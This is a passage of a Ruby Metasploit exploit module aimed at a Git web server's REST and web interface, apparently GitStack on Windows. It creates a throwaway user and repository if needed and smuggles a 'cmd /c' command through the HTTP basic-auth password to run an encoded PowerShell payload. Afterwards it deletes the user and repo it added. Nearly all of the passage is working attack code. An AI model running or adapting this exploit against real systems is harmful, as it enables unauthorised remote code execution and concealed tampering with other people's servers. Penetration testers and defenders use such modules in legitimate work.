vprint_good("#{res.body}")
return repo
else
print_status('Unable to create repository')
return nil
end
end
def delete_repo(repo)
begin
res = send_request_cgi({
'uri' => "/rest/repository/#{repo}/",
'method' => 'DELETE'
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
vprint_good("#{res.body}")
else
print_status('Failed to delete repository')
end
end
def create_user
user = Rex::Text.rand_text_alpha(5)
pass = user
begin
res = send_request_cgi({
'uri' => '/rest/user/',
'method' => 'POST',
'vars_post' => {
'username' => user,
'password' => pass
}
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
vprint_good("Created user: #{user}")
return user
else
print_error("Failed to create user")
return nil
end
end
def delete_user(user)
begin
res = send_request_cgi({
'uri' => "/rest/user/#{user}/",
'method' => 'DELETE'
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
vprint_good("#{res.body}")
else
print_status('Delete user unsuccessful')
end
end
def mod_user(repo, user, method)
begin
res = send_request_cgi({
'uri' => "/rest/repository/#{repo}/user/#{user}/",
'method' => method
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
vprint_good("#{res.body}")
else
print_status('Unable to add/remove user from repo')
end
end
def repo_users(repo)
begin
res = send_request_cgi({
'uri' => "/rest/repository/#{repo}/user/",
'method' => 'GET'
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
begin
users = res.get_json_document
users -= ['everyone']
rescue JSON::ParserError => e
print_error("Failed: #{e.class} - #{e.message}")
users = nil
end
else
return nil
end
return users
end
def run_exploit(repo, user, cmd)
begin
res = send_request_cgi({
'uri' => '/web/index.php',
'method' => 'GET',
'authorization' => basic_auth(user, "#{Rex::Text.rand_text_alpha(1)} && cmd /c #{cmd}"),
'vars_get' => {
'p' => "#{repo}.git",
'a' => 'summary'
}
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
end
def exploit
command = cmd_psh_payload(
payload.encoded,
payload_instance.arch.first,
{ :remove_comspec => true, :encode_final_payload => true }
)
fail_with(Failure::PayloadFailed, "Payload exceeds space left in exec call") if command.length > 6110
web = check_web
repos = check_repos
if web.nil? || repos.nil?
return
end
unless web
update_web(!web)
# Wait for interface
sleep 8
end
if repos
pwn_repo = repos[0]['name']
else
pwn_repo = create_repo
end
r_users = repo_users(pwn_repo)
if r_users.present?
pwn_user = r_users[0]
run_exploit(pwn_repo, pwn_user, command)
else
pwn_user = create_user
if pwn_user
mod_user(pwn_repo, pwn_user, 'POST')
run_exploit(pwn_repo, pwn_user, command)
mod_user(pwn_repo, pwn_user, 'DELETE')
delete_user(pwn_user)
end
end
unless web
update_web(web)
end
unless repos
delete_repo(pwn_repo)
end
end
end